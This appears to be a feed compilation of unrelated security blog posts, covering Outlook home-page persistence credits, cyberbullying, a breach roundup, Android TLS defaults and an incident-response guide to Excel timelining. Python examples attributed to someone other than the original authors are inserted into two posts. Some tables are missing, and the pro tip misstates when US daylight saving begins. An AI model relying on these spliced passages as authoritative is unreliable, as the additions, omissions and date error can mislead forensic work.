  • Office Application Startup (T1137): Nick Carr contributed CVE-2017-11774 on behalf of FireEye for expansion of this technique
  • Execution Guardrails (T1480): Nick Carr contributed this new technique to MITRE ATT&CK and it is used within the UNC1194 red team sample in this blog post


The authors would like to acknowledge all of those at FireEye and the rest of the security industry who have combatted targeted attackers leveraging creative techniques like home page persistence, but especially the analysts in Managed Defense SOC working around the clock to secure our customers and have disrupted this specific attack chain several times. We want to thank the SensePost team – for their continued creativity, responsible disclosure of CVE-2017-11774, and their defensive-minded release of NotRuler – as well as the TrustedSec crew for showing us some innovative implementations of these techniques and being great to coordinate with on this blog post. Lastly, thanks to Aristotle who has already offered what can only be interpreted as seasoned incident response and hardening advice for those who have seen RULER’s home page persistence in-the-wild: “He who is to be a good ruler must have first been ruled.”

What You Need to Know about Cyberbullying


Have you noticed a decrease in your child's happiness or an increase in their anxiety? Cyberbullying might be the cause of these behavioral changes.

Bullying is no longer confined to school playgrounds and neighborhood alleys. It has long moved into the online world, thanks to the easy access to technology. Between Twitter, SnapChat, TikTok, Instagram, WhatsApp, or even standard SMS texts, emails and instant messages, cyberbullies have an overwhelming number of technical avenues to exploit.

While cyberbullying can happen to anyone, studies have shown that teens are usually more susceptible to it. The percentage of individuals – middle and high school students from across the U.S. — who have experienced cyberbullying at some point, has more than doubled (19% to 37%) from 2007 to 2019, according to data from the Cyberbullying Research Center.

Before you teach your kids how to respond to cyberbullying, it is important to know what it entails.


What is Cyberbullying?

Cyberbullying is bullying that takes place over digital devices like cell phones, tablets, or computers. Even smaller devices like smartwatches and iPods can facilitate cyberbullying. Today, social media platforms act like a breeding ground for cyberbullying.

Cyberbullying usually begins with teasing that turns to harassment. From there it can evolve in many ways, such as impersonation and catfishing, doxxing, or even blackmail through the use of compromising photos.

Catfishing is the practice of creating a fake identity online and using it to lure someone into a relationship. Teens also impersonate others online to humiliate their targets; this impersonation is itself a form of cyberbullying.

Doxxing is an attack method that involves searching for, collecting and publishing personal or identifying information about someone on the internet.

Identifying the Warning Signs

When it comes to cyberbullying, just like traditional bullying, there are warning signs for parents to watch for in their child. Although the warning signs may vary, Nemours Children’s Health System has identified the most common ones as:

  • being upset or emotional during or after internet or phone time
  • being overly protective of their digital life and mobile devices
  • withdrawal from family members, friends, and activities
  • missing or avoiding school 
  • a dip in school performance
  • changes in mood, behavior, sleep, or appetite
  • suddenly avoiding the computer or cellphone
  • being nervous or jumpy when getting an instant message, text, or email
  • avoiding conversations about their cell phone activities

Remember, there are free software and apps available to help you restrict content, block domains, or even monitor your child’s online activity.

While having a child who is being cyberbullied is every parent’s nightmare, it’s equally important to understand if your child is cyberbullying others.

Do you believe your child is a cyberbully? That difficult and delicate situation needs its own blog post—but don’t worry, we have you covered.

You’ll also find many cyberbullying prevention and resolution resources on both federal and local levels, as well as support from parents going through similar issues on our community forum.

Preparing your kids for a world where cyberbullying is a reality isn’t easy, but it is necessary. By creating a safe space for your child to talk to you about cyberbullying, you’re setting the foundation to squash this problem quickly if it arises.

The post What You Need to Know about Cyberbullying appeared first on Webroot Blog.

Securing Emerging Payment Channels

Securing emerging payment channels is a core pillar in the PCI Security Standards Council’s (PCI SSC) strategic framework, which guides how the Council achieves its mission and supports the needs of the global payments industry. In this interview with PCI SSC Standards Officer Emma Sutcliffe, we discuss this pillar and how it’s shaping Council priorities.

Cyber Security Roundup for November 2019

In recent years politically motivated cyber-attacks during elections have become an expected norm, so it was no real surprise when the Labour Party reported it was hit with two DDoS attacks in the run-up to the UK general election, which was well publicised by the media. What wasn't well publicised was that both the Conservative Party and the Liberal Democrats were also hit with cyber-attacks. These weren't nation-state orchestrated attacks either: the black-hat hacking group Lizard Squad, well known for its high-profile DDoS attacks, is believed to be responsible.

The launch of Disney Plus didn't go exactly to plan: within hours of the streaming service going live, compromised Disney Plus account credentials were being sold on the black market for as little as £2.30 a pop. Disney suggested hackers had obtained the credentials from previous leaks of identical credentials its customers had reused on other compromised or insecure websites, and from keylogging malware. It's worth noting that Disney Plus doesn't use Multi-Factor Authentication (MFA); implementing MFA to protect customer accounts would have prevented the vast majority of Disney Plus account compromises in my view.

Trend Micro reported that an insider stole around 100,000 customer account records, with the data then used by con artists to make convincing scam phone calls impersonating the company to a number of its customers. In a statement, Trend Micro said it determined the attack was an inside job: an employee used fraudulent methods to access its customer support databases, retrieved the data and then sold it on. “Our open investigation has confirmed that this was not an external hack, but rather the work of a malicious internal source that engaged in a premeditated infiltration scheme to bypass our sophisticated controls,” the company said. The employee behind it was identified and fired, and Trend Micro said it is working with law enforcement in an ongoing investigation.

Security researchers found 4 billion records from 1.2 billion people on an unsecured Elasticsearch server. The personal information includes names, home and mobile phone numbers and email addresses and what may be information scraped from LinkedIn, Facebook and other social media sources.

T-Mobile reported a data breach affecting some of its prepaid account customers. A T-Mobile spokesman said “Our cybersecurity team discovered and shut down malicious, unauthorized access to some information related to your T-Mobile prepaid wireless account. We promptly reported this to authorities”.

A French hospital was hit hard by a ransomware attack which caused "very long delays in care". According to a spokesman, medical staff at Rouen University Hospital Centre (CHU) abandoned their PCs because the ransomware had made them unusable and returned to the "old-fashioned method of paper and pencil" instead. No details about the strain of ransomware have been released.

Microsoft released patches for 74 vulnerabilities in November, 13 of which are rated critical. One of these was an Internet Explorer vulnerability (CVE-2019-1429), a scripting engine memory corruption flaw reachable from a malicious website or via an ActiveX control embedded in an Office document, which was known to be actively exploited.

It was a busy month for blog articles and threat intelligence news, all are linked below.


An Update on Android TLS Adoption

Posted by Bram Bonné, Senior Software Engineer, Android Platform Security & Chad Brubaker, Staff Software Engineer, Android Platform Security


Android is committed to keeping users, their devices, and their data safe. One of the ways that we keep data safe is by protecting network traffic that enters or leaves an Android device with Transport Layer Security (TLS).

Android 7 (API level 24) introduced the Network Security Configuration in 2016, allowing app developers to configure the network security policy for their app through a declarative configuration file. To ensure apps are safe, apps targeting Android 9 (API level 28) or higher automatically have a policy set by default that prevents unencrypted traffic for every domain.

Today, we’re happy to announce that 80% of Android apps are encrypting traffic by default. The percentage is even greater for apps targeting Android 9 and higher, with 90% of them encrypting traffic by default.

Percentage of apps that block cleartext by default.

Since November 1, 2019, all apps on Google Play (new apps as well as updates to existing apps) must target at least Android 9 (API level 28). As a result, we expect these numbers to continue improving. Network traffic from these apps is secure by default, and any use of unencrypted connections is the result of an explicit choice by the developer.

The latest releases of Android Studio and Google Play’s pre-launch report warn developers when their app includes a potentially insecure Network Security Configuration (for example, when they allow unencrypted traffic for all domains or when they accept user provided certificates outside of debug mode). This encourages the adoption of HTTPS across the Android ecosystem and ensures that developers are aware of their security configuration.

[Figure: Example of a warning shown to developers in Android Studio.]

[Figure: Example of a warning shown to developers as part of the pre-launch report.]

What can I do to secure my app?

For apps targeting Android 9 and higher, the out-of-the-box default is to encrypt all network traffic in transit and trust only certificates issued by an authority in the standard Android CA set without requiring any extra configuration. Apps can provide an exception to this only by including a separate Network Security Config file with carefully selected exceptions.

If your app needs to allow traffic to certain domains, it can do so by including a Network Security Config file that only includes these exceptions to the default secure policy. Keep in mind that you should be cautious about the data received over insecure connections as it could have been tampered with in transit.

<network-security-config>
    <base-config cleartextTrafficPermitted="false" />
    <domain-config cleartextTrafficPermitted="true">
        <domain includeSubdomains="true"></domain>
        <domain includeSubdomains="true"></domain>
    </domain-config>
</network-security-config>

If your app needs to be able to accept user-specified certificates for testing purposes (for example, connecting to a local server during testing), make sure the certificates element shown below is wrapped inside a debug-only override element, so that it applies only to debuggable builds. This ensures the connections in the production version of your app are secure.

<certificates src="user"/>
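The warnings described above can be reproduced as a pre-commit check. The following is an added example (my own code, not from the Android post or from Android Studio's tooling): a small Python lint that parses a Network Security Config and flags a base-config that permits cleartext for every domain, lists each per-domain cleartext exception for review, and flags user-installed certificates trusted anywhere outside the debug-only override element. The element names used (network-security-config, base-config, domain-config, domain, debug-overrides, trust-anchors, certificates) are those of Android's Network Security Config format; the two sample documents are constructed for this example, including the placeholder domain name.

```python
"""Lint an Android Network Security Config for the two risky patterns the
post mentions: cleartext permitted for every domain in <base-config>, and
user-installed certificates trusted anywhere outside <debug-overrides>.

Added example, not code from the Android post or tooling. Element names are
those of the Network Security Config format; the sample documents are
constructed for this example.
"""
import xml.etree.ElementTree as ET

# Constructed sample: the default-secure shape, one documented cleartext
# exception, and user certificates trusted only in debuggable builds.
GOOD_CONFIG = """<network-security-config>
    <base-config cleartextTrafficPermitted="false" />
    <domain-config cleartextTrafficPermitted="true">
        <domain includeSubdomains="true">legacy.example.invalid</domain>
    </domain-config>
    <debug-overrides>
        <trust-anchors>
            <certificates src="user" />
        </trust-anchors>
    </debug-overrides>
</network-security-config>
"""

# Constructed sample carrying both findings the tooling warns about.
BAD_CONFIG = """<network-security-config>
    <base-config cleartextTrafficPermitted="true">
        <trust-anchors>
            <certificates src="system" />
            <certificates src="user" />
        </trust-anchors>
    </base-config>
</network-security-config>
"""


def _permits_cleartext(elem):
    return elem.get("cleartextTrafficPermitted", "").lower() == "true"


def lint_network_security_config(xml_text):
    """Return a list of (severity, message) findings for one config document."""
    root = ET.fromstring(xml_text)
    if root.tag != "network-security-config":
        return [("error", "root element is not <network-security-config>")]
    findings = []

    base = root.find("base-config")
    if base is not None and _permits_cleartext(base):
        findings.append(("high", "base-config permits cleartext traffic for all domains"))

    # Per-domain cleartext exceptions are allowed; list them so they get reviewed.
    for dc in root.iter("domain-config"):
        if _permits_cleartext(dc):
            names = [d.text.strip() for d in dc.findall("domain") if d.text]
            detail = ", ".join(names) if names else "(no domain listed)"
            findings.append(("info", "cleartext permitted for: " + detail))

    # Everything under <debug-overrides> only applies to debuggable builds,
    # so collect those elements and exempt them from the user-cert check.
    debug_only = set()
    for dbg in root.findall("debug-overrides"):
        debug_only.update(id(e) for e in dbg.iter())
    for parent in root.iter():
        if id(parent) in debug_only:
            continue
        for cert in parent.findall("trust-anchors/certificates"):
            if cert.get("src") == "user":
                findings.append(("high",
                    f"user certificates trusted in <{parent.tag}> outside debug-overrides"))
    return findings


def is_release_safe(xml_text):
    """True when no high-severity finding is present."""
    return not any(sev == "high" for sev, _ in lint_network_security_config(xml_text))


if __name__ == "__main__":
    for name, doc in (("good", GOOD_CONFIG), ("bad", BAD_CONFIG)):
        print(name, lint_network_security_config(doc))
```

Run against the XML in res/xml of an app module, the "high" findings correspond to the two cases the Android Studio and pre-launch report warnings cover; the "info" entries are the deliberate exceptions a reviewer still wants to see enumerated.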

What can I do to secure my library?

If your library directly creates secure/insecure connections, make sure that it honors the app's cleartext settings by checking isCleartextTrafficPermitted before opening any cleartext connection.

Android’s built-in networking libraries and other popular HTTP libraries such as OkHttp or Volley have built-in Network Security Config support.

Giles Hogben, Nwokedi Idika, Android Platform Security, Android Studio and Pre-Launch Report teams

Passwords: Our First Line of Defense

Darin Roberts // “Why do you recommend a 15-character password policy when (name your favorite policy here) recommends only 8-character minimum passwords?” I have had this question posed to me a couple of times in the very recent past. There were 2 separate policies that were shown to me when asking these questions. First was […]

The post Passwords: Our First Line of Defense appeared first on Black Hills Information Security.

Excelerating Analysis – Tips and Tricks to Analyze Data with Microsoft Excel

Incident response investigations don’t always involve standard host-based artifacts with fully developed parsing and analysis tools. At FireEye Mandiant, we frequently encounter incidents that involve a number of systems and solutions that utilize custom logging or artifact data. Determining what happened in an incident involves taking a dive into whatever type of data we are presented with, learning about it, and developing an efficient way to analyze the important evidence.

One of the most effective tools to perform this type of analysis is one that is in almost everyone’s toolkit: Microsoft Excel. In this article we will detail some tips and tricks with Excel to perform analysis when presented with any type of data.

Summarizing Verbose Artifacts

Tools such as FireEye Redline include handy timeline features to combine multiple artifact types into one concise timeline. When we use individual parsers or custom artifact formats, it may be tricky to view multiple types of data in the same view. Normalizing artifact data with Excel to a specific set of easy-to-use columns makes for a smooth combination of different artifact types.

Consider trying to review parsed file system, event log, and Registry data in the same view using the following data.

File system artifact (one parsed row):

$SI Created:      2019-10-14 23:13:04
$SI Modified:     2019-10-14 23:33:45
File Name:        Default.rdp
File Path:        C:\Users\attacker\Documents\
File Size:        485
File MD5:         c482e563df19a401941c99888ac2f525
File Attributes:  Archive
File Deleted:     FALSE

Event log artifact (one parsed row):

Event Gen Time:   2019-10-14 23:13:06
Event ID:         4648
Event Message:    A logon was attempted using explicit credentials.
   Security ID:  DomainCorp\Administrator
   Account Name:  Administrator
   Account Domain:  DomainCorp
   Logon ID:  0x1b38fe
   Logon GUID:  {00000000-0000-0000-0000-000000000000}
Account Whose Credentials Were Used:
   Account Name:  VictimUser
   Account Domain:  DomainCorp
   Logon GUID:  {00000000-0000-0000-0000-000000000000}
Target Server:
   Target Server Name: DestinationServer
   Additional Information:
Process Information:
   Process ID:  0x5ac
   Process Name:  C:\Program Files\Internet Explorer\iexplore.exe
Network Information:
   Network Address: -
   Port:   -
Event Category:   Logon
Event User:       Administrator
Event System:     SourceSystem

Registry artifact (one parsed row):

Timestamp:        2019-10-14 23:33:46
Key Path:         HKEY_USER\Software\Microsoft\Terminal Server Client\Servers\

Since these raw artifact data sets have different column headings and data types, they would be difficult to review in one timeline. If we format the data using Excel string concatenation, we can make the data easy to combine into a single timeline view. To format the data, we can use the “&” operator to join the information we may need into a single “Summary” field.

An example formula to join the relevant file system data, delimited by pipes, is “=D2 & " | " & C2 & " | " & E2 & " | " & F2 & " | " & G2 & " | " & H2”. Combining this summary column with a “Timestamp” and a “Timestamp Type” column gives us everything we need for streamlined analysis.


Timestamp:       2019-10-14 23:13:04
Timestamp Type:  $SI Created
Summary:         C:\Users\attacker\Documents\ | Default.rdp | 485 | c482e563df19a401941c99888ac2f525 | Archive | FALSE

Timestamp:       2019-10-14 23:13:06
Timestamp Type:  Event Gen Time
Summary:         4648 | A logon was attempted using explicit credentials.
   Security ID:  DomainCorp\Administrator
   Account Name:  Administrator
   Account Domain:  DomainCorp
   Logon ID:  0x1b38fe
   Logon GUID:  {00000000-0000-0000-0000-000000000000}
Account Whose Credentials Were Used:
   Account Name:  VictimUser
   Account Domain:  DomainCorp
   Logon GUID:  {00000000-0000-0000-0000-000000000000}
Target Server:
   Target Server Name: DestinationServer
   Additional Information:
Process Information:
   Process ID:  0x5ac
   Process Name:  C:\Program Files\Internet Explorer\iexplore.exe
Network Information:
   Network Address: -
   Port:   - | Logon | Administrator | SourceSystem

Timestamp:       2019-10-14 23:33:45
Timestamp Type:  $SI Modified
Summary:         C:\Users\attacker\Documents\ | Default.rdp | 485 | c482e563df19a401941c99888ac2f525 | Archive | FALSE

Timestamp:       2019-10-14 23:33:46
Timestamp Type:
Summary:         HKEY_USER\Software\Microsoft\Terminal Server Client\Servers\ | DestinationServer | UsernameHint | VictimUser

After sorting by timestamp, we can see evidence of the “DomainCorp\Administrator” account connecting from “SourceSystem” to “DestinationServer” with the “DomainCorp\VictimUser” account via RDP across three artifact types.
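The same normalization can be scripted when the artifact volume outgrows a spreadsheet. The following is an added example (my own code, not part of the Mandiant post) in Python: each artifact type gets a schema naming its timestamp columns and the columns that feed the Summary field, a file row yields one timeline entry per timestamp column (Created and Modified, as in the table above), and the merged entries are sorted. The sample rows mirror the post's RDP scenario; the registry headings "Key Modified", "Key Name", "Value Name" and "Value Data" are assumed, since the post only shows "Key Path".

```python
"""Normalize file-system, event-log and Registry artifacts into one
Timestamp / Timestamp Type / Summary timeline, as the Excel "&" formula does.

Added example, not part of the Mandiant post. The rows mirror the post's
RDP example; the registry column headings other than "Key Path" are assumed.
"""
from datetime import datetime

SEP = " | "   # same delimiter as the =D2 & " | " & C2 ... formula
FMT = "%Y-%m-%d %H:%M:%S"

FILE_ROWS = [{
    "$SI Created": "2019-10-14 23:13:04", "$SI Modified": "2019-10-14 23:33:45",
    "File Name": "Default.rdp", "File Path": "C:\\Users\\attacker\\Documents\\",
    "File Size": "485", "File MD5": "c482e563df19a401941c99888ac2f525",
    "File Attributes": "Archive", "File Deleted": "FALSE",
}]
EVENT_ROWS = [{
    "Event Gen Time": "2019-10-14 23:13:06", "Event ID": "4648",
    "Event Message": "A logon was attempted using explicit credentials.",
    "Event Category": "Logon", "Event User": "Administrator",
    "Event System": "SourceSystem",
}]
REGISTRY_ROWS = [{
    "Key Modified": "2019-10-14 23:33:46",   # assumed heading
    "Key Path": "HKEY_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\\",
    "Key Name": "DestinationServer",         # assumed heading
    "Value Name": "UsernameHint",            # assumed heading
    "Value Data": "VictimUser",              # assumed heading
}]

# Per artifact type: (timestamp columns, columns that make up the Summary field).
SCHEMAS = {
    "file": (["$SI Created", "$SI Modified"],
             ["File Path", "File Name", "File Size", "File MD5",
              "File Attributes", "File Deleted"]),
    "event": (["Event Gen Time"],
              ["Event ID", "Event Message", "Event Category",
               "Event User", "Event System"]),
    "registry": (["Key Modified"],
                 ["Key Path", "Key Name", "Value Name", "Value Data"]),
}


def summarize(row, columns):
    """Join the chosen columns with the same delimiter the Excel formula uses."""
    return SEP.join(str(row[c]) for c in columns)


def normalize(rows, time_columns, summary_columns):
    """One (timestamp, timestamp type, summary) entry per timestamp column."""
    out = []
    for row in rows:
        summary = summarize(row, summary_columns)
        for tcol in time_columns:
            out.append((datetime.strptime(row[tcol], FMT), tcol, summary))
    return out


def build_timeline(sources):
    """sources maps artifact type -> parsed rows. Returns entries sorted by time."""
    entries = []
    for kind, rows in sources.items():
        time_cols, summary_cols = SCHEMAS[kind]
        entries.extend(normalize(rows, time_cols, summary_cols))
    return sorted(entries, key=lambda e: e[0])


def render(entries):
    return [f"{ts:{FMT}}{SEP}{ttype}{SEP}{summary}" for ts, ttype, summary in entries]


if __name__ == "__main__":
    sources = {"file": FILE_ROWS, "event": EVENT_ROWS, "registry": REGISTRY_ROWS}
    for line in render(build_timeline(sources)):
        print(line)
```

Adding a fourth artifact type is one more SCHEMAS entry; the sort key is the parsed datetime rather than the string, so sources with different timestamp formats can be given their own format when parsed.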

Time Zone Conversions

One of the most critical elements of incident response and forensic analysis is timelining. Temporal analysis will often turn up new evidence by identifying events that precede or follow an event of interest. Equally critical is producing an accurate timeline for reporting. Timestamps and time zones can be frustrating, and things can get confusing when the systems being analyzed span various time zones. Mandiant tracks all timestamps in Coordinated Universal Time (UTC) format in its investigations to eliminate any confusion of both time zones and time adjustments such as daylight savings and regional summer seasons. 

Of course, various sources of evidence do not always log time the same way. Some may be local time, some may be UTC, and, as mentioned, data from sources in various geographical locations complicates things further. When compiling timelines, it is important to first know whether the evidence source is logged in UTC or local time. If it is logged in local time, we need to confirm which local time zone the evidence source is from. Then we can use the Excel TIME() formula to convert timestamps to UTC as needed.

This example scenario is based on a real investigation where the target organization was compromised via phishing email, and employee direct deposit information was changed via an internal HR application. In this situation, we have three log sources: email receipt logs, application logins, and application web logs. 

The email logs are recorded in UTC and contain the following information:

The application logins are recorded in Eastern Daylight Time (EDT) and contain the following:

The application web logs are also recorded in Eastern Daylight Time (EDT) and contain the following:

To take this information and turn it into a master timeline, we can use the CONCAT function (an alternative to the ampersand concatenation used previously) to make a summary of the columns in one cell for each log source, such as this example formula for the email receipt logs:

This is where checking our time zones for each data source is critical. If we took the information as it is presented in the logs and assumed the timestamps were all in the same time zone and created a timeline of this information, it would look like this:

As the previous screenshot stands, we have some login events to the HR application, which may look like normal activity for the employees. Then, later in the day, they receive some suspicious emails. If this were hundreds of lines of log events, we would risk the login and web log events being overlooked, since their time of activity precedes our suspected initial compromise vector by a few hours. If this were a timeline used for reporting, it would also be inaccurate.

When we know which time zone our log sources are in, we can adjust the timestamps accordingly to reflect UTC. In this case, we confirmed through testing that the application logins and web logs are recorded in EDT, which is four hours behind UTC, or “UTC-4”. To change these to UTC time, we just need to add four hours to the time. The Excel TIME function makes this easy. We can just add a column to the existing tables, and in the first cell we type “=A2+TIME(4,0,0)”. Breaking this down:

  • =A2
    • Reference cell A2 (in this case our EDT timestamp). Note this is not an absolute reference, so we can use this formula for the rest of the rows.
  • +TIME
    • This tells Excel to take the value of the data in cell A2 as a “time” value type and add the following amount of time to it:
  • (4,0,0)
    • The TIME function in this instance requires three values, which are, from left to right: hours, minutes, seconds. In this example, we are adding 4 hours, 0 minutes, and 0 seconds.

Now we have a formula that takes the EDT timestamp and adds four hours to it to make it UTC. Then we can replicate this formula for the rest of the table. The end result looks like this:

When we have all of our logs in the same time zone, we are ready to compile our master timeline. Taking the UTC timestamps and the summary events we made, our new, accurate timeline looks like this:

Now we can clearly see suspicious emails sent to (fictional) employees Austin and Dave. A few minutes later, Austin’s account logs into the HR application and adds a new bank account. After this, we see the same email sent to Jake. Soon after this, Jake’s account logs into the HR application and adds the same bank account information as Austin’s. Converting all our data sources to the same time zone with Excel allowed us to quickly link these events together and easily identify what the attacker did. Additionally, it provided us with more indicators, such as the known-bad bank account number to search for in the rest of the logs.

Pro Tip: Be sure to account for log data spanning over changes in UTC offset due to regional events such as daylight savings or summer seasons. For example, local time zone adjustments will need to change for logs in United States Eastern Time from Virginia, USA from +TIME(5,0,0) to +TIME(4,0,0) the first weekend in March every year and back from +TIME(4,0,0) to +TIME(5,0,0) the first weekend in November to account for daylight and standard shifts.
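The offset change in the pro tip is the part a fixed "+TIME(4,0,0)" column silently gets wrong for logs that span the spring or autumn change. The following is an added example (my own code, not part of the Mandiant post) in Python that picks the Eastern offset per timestamp, computing the daylight-saving boundaries from the US rule in force since 2007 (02:00 on the second Sunday of March to 02:00 on the first Sunday of November) so that no tz database is needed, then merges UTC and Eastern sources into one master timeline. The log rows are constructed for this example; the source names and summaries are placeholders.

```python
"""Convert US Eastern local log timestamps to UTC with the daylight-saving
offset chosen per timestamp (UTC-4 in EDT, UTC-5 in EST), instead of a fixed
"=A2+TIME(4,0,0)", then merge sources logged in different zones.

Added example, not part of the Mandiant post. DST boundaries follow the US
rule in force since 2007; the log rows are constructed for this example.
"""
from datetime import datetime, timedelta

FMT = "%Y-%m-%d %H:%M:%S"


def nth_sunday(year, month, n):
    """Midnight on the n-th Sunday of the given month."""
    first = datetime(year, month, 1)
    first += timedelta(days=(6 - first.weekday()) % 7)  # weekday(): Mon=0 .. Sun=6
    return first + timedelta(weeks=n - 1)


def eastern_offset_hours(local_dt):
    """Hours to ADD to a US Eastern local timestamp to reach UTC: 4 in DST, else 5."""
    dst_start = nth_sunday(local_dt.year, 3, 2).replace(hour=2)
    dst_end = nth_sunday(local_dt.year, 11, 1).replace(hour=2)
    # 01:00-01:59 on the November change day occurs twice; treated as EDT here.
    return 4 if dst_start <= local_dt < dst_end else 5


def offset_for(ts):
    return eastern_offset_hours(datetime.strptime(ts, FMT))


def local_eastern_to_utc(ts):
    local_dt = datetime.strptime(ts, FMT)
    return local_dt + timedelta(hours=eastern_offset_hours(local_dt))


def utc_string(ts):
    return local_eastern_to_utc(ts).strftime(FMT)


# Constructed rows: (source, timestamp as logged, zone the source logs in, summary).
LOG_ROWS = [
    ("email", "2019-07-10 13:02:11", "UTC", "suspicious email to austin"),
    ("app login", "2019-07-10 09:07:40", "Eastern", "austin logged in"),
    ("web", "2019-07-10 09:09:15", "Eastern", "austin added bank account"),
    ("email", "2019-07-10 13:20:55", "UTC", "suspicious email to jake"),
    ("app login", "2019-07-10 09:26:03", "Eastern", "jake logged in"),
]


def as_logged_timeline(rows):
    """The trap the post warns about: sort on timestamps as logged, ignoring zones."""
    return sorted((ts, source, summary) for source, ts, _, summary in rows)


def master_timeline(rows):
    """Rows sorted on UTC; Eastern rows are converted, UTC rows parsed as-is."""
    out = []
    for source, ts, zone, summary in rows:
        utc = datetime.strptime(ts, FMT) if zone == "UTC" else local_eastern_to_utc(ts)
        out.append((utc, source, summary))
    return sorted(out)


if __name__ == "__main__":
    for utc, source, summary in master_timeline(LOG_ROWS):
        print(f"{utc:{FMT}} UTC  {source:<10} {summary}")
```

Sorting the rows as logged puts the application logins ahead of the emails that triggered them; converting first restores the email, login, bank-account-change order the post describes. Other zones need their own offset rule or a tz database.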

CountIf for Log Baselining

When reviewing logs that record authentication in the form of a user account and timestamp, we can use COUNTIF to establish simple baselines to identify those user accounts with inconsistent activity.  

In the example of user logons that follows, we'll use the formula "=COUNTIF($B$2:$B$25,B2)" to establish a historical baseline. Here is a breakdown of the parameters for this COUNTIF formula located in C2 in our example: 

  • COUNTIF
    • This Excel formula counts how many times a value exists in a range of cells.
  • $B$2:$B$25
    • This is the entire range of cells, B2 through B25, that we want to search for a specific value. Note the use of "$" to ensure that the start and end of the range are an absolute reference and are not automatically updated by Excel if we copy this formula to other cells.
  • B2
    • This is the cell that contains the value we want to search for and count occurrences of in our range of $B$2:$B$25. Note that this parameter is not an absolute reference with a preceding "$". This allows us to fill the formula down through all rows and ensure that we are counting the applicable user name.

To summarize, this formula will search the username column of all logon data and count how many times the user of each logon has logged on in total across all data points. 

When most user accounts log on regularly, a compromised account being used to logon for the first time may clearly stand out when reviewing total log on counts. If we have a specific time frame in mind, it may be helpful to know which accounts first logged on during that time.  

The COUNTIF formula can help track accounts through time to identify their first log on which can help identify rarely used credentials that were abused for a limited time frame.  

We'll start with the formula "=COUNTIF($B$2:$B2,B2)" in cell D3. Here is a breakdown of the parameters for this COUNTIF formula. Note that the use of "$" for absolute referencing is slightly different for the range used, and that is an important nuance:

  • COUNTIF
    • This Excel formula counts how many times a value exists in a range of cells.
  • $B$2:$B2
    • This is the range of cells we start with: B2 through B2, a single cell. Since we want the range to grow as we move down the rows of log data, the ending cell's row number (2 in this example) is not made absolute. As we fill this formula down through the rest of our log data, it will automatically expand the range to include the current log record and all previous logs.
  • B2
    • This cell contains the value we want to search for and count occurrences of in our defined range. Note that this parameter B2 is not an absolute reference with a preceding "$". This allows us to fill the formula down through all rows and ensure that we are counting the applicable user name.

To summarize, this formula will search the username column of all logon data before and including the current log and count how many times the user of each logon has logged on up to that point in time. 

The following example illustrates how Excel automatically updated the range for D15 to $B$2:$B15 using the fill handle.  
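Both COUNTIF variants reduce to a frequency count and a running count over the user column. The following is an added example (my own code, not part of the Mandiant post) in Python that computes column C (total logons per account) and column D (logons up to and including the current row), then uses the running count to list the accounts whose first logon falls inside a window of interest and the accounts with at most a given number of logons overall. The logon rows and account names are constructed for this example.

```python
"""COUNTIF-style logon baselining: total logons per account
(=COUNTIF($B$2:$B$25,B2)) and the running count up to each row
(=COUNTIF($B$2:$B2,B2)), plus first-logon and rare-account helpers.

Added example, not part of the Mandiant post; the logon rows are constructed.
"""
from collections import Counter
from datetime import datetime

FMT = "%Y-%m-%d %H:%M:%S"

# Constructed logon rows: (timestamp, user), already sorted by time like the sheet.
LOGONS = [
    ("2019-10-14 08:01:00", "alice"),
    ("2019-10-14 08:03:00", "bob"),
    ("2019-10-14 08:04:00", "alice"),
    ("2019-10-14 12:30:00", "bob"),
    ("2019-10-14 23:13:00", "svc_backup"),   # first and only use of this account
    ("2019-10-15 08:02:00", "alice"),
    ("2019-10-15 08:05:00", "bob"),
    ("2019-10-15 09:10:00", "carol"),
]


def total_counts(rows):
    """Column C: how many times each row's user appears in the whole column."""
    totals = Counter(user for _, user in rows)
    return [totals[user] for _, user in rows]


def running_counts(rows):
    """Column D: occurrences of the row's user in the rows up to and including it."""
    seen = Counter()
    out = []
    for _, user in rows:
        seen[user] += 1
        out.append(seen[user])
    return out


def first_logons_in_window(rows, start, end):
    """(timestamp, user) pairs whose running count is 1 within [start, end]."""
    s, e = datetime.strptime(start, FMT), datetime.strptime(end, FMT)
    hits = []
    for (ts, user), n in zip(rows, running_counts(rows)):
        if n == 1 and s <= datetime.strptime(ts, FMT) <= e:
            hits.append((ts, user))
    return hits


def rare_accounts(rows, threshold=1):
    """Accounts with at most `threshold` logons in the whole data set."""
    totals = Counter(user for _, user in rows)
    return sorted(u for u, c in totals.items() if c <= threshold)


if __name__ == "__main__":
    for (ts, user), total, running in zip(LOGONS, total_counts(LOGONS), running_counts(LOGONS)):
        print(f"{ts}  {user:<12} total={total}  running={running}")
    print("first logons 14 Oct 20:00 to 15 Oct 00:00:",
          first_logons_in_window(LOGONS, "2019-10-14 20:00:00", "2019-10-15 00:00:00"))
    print("rare accounts:", rare_accounts(LOGONS))
```

As with the colour scale in the sheet, a count of 1 is a prompt to look, not a verdict: carol's first logon on the 15th and svc_backup's late-night logon on the 14th both surface, and only the surrounding evidence says which one matters.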

To help visualize a large data set, let's add color scale conditional formatting to each row individually. To do so: 

  1. Select only the cells we want to compare with the color scale (such as D2 to D25). 
  2. On the Home menu, click the Conditional Formatting button in the Styles area. 
  3. Click Color Scales. 
  4. Click the type of color scale we would like to use. 

The following examples set the lowest values to red and the highest values to green. We can see how: 

  • Users with lower authentication counts contrast against users with more authentications. 
  • The first authentication times of users stand out in red. 

Whichever colors are used, be careful not to assume that one color, such as green, implies safety and another color, such as red, implies maliciousness.


The techniques described in this post are just a few ways to utilize Excel to perform analysis on arbitrary data. While these techniques may not leverage some of the more powerful features of Excel, as with any variety of skill set, mastering the fundamentals enables us to perform at a higher level. Employing fundamental Excel analysis techniques can empower an investigator to work through analysis of any presented data type as efficiently as possible.

Software Patching Statistics for 2019: Common Practices and Vulnerabilities

Wondering about software patching statistics and what the current state of affairs on updates is? This is where you will find all the relevant data as soon as experts reveal it, as well as stats based on our own customer data.

I will keep updating this list of software patching statistics periodically so it’s easier to see both the necessity of patching and how well companies worldwide do it (or not).

Without question, difficulties and delays in applying software patches are still one of the biggest threats for companies today. Apps and software lacking the latest update are some of the easiest targets for any hacker who wants to infiltrate an organization.

Experts keep saying it over and over, but people have a hard time getting to those never-ending software updates. It’s both a matter of prioritization and a matter of difficulty (in the absence of a tool which can successfully automate software patching).

So, here are the most important truths about updates and how we apply them or not. I have broken down the software patching statistics of recent years in sections pertaining to the behavior or phenomena

Why Software Patching is Important, in Statistics and Data:

  • 80% of companies who had a data breach or a failed audit could have prevented it by patching on time or doing configuration updates – Voke Media survey, 2016.
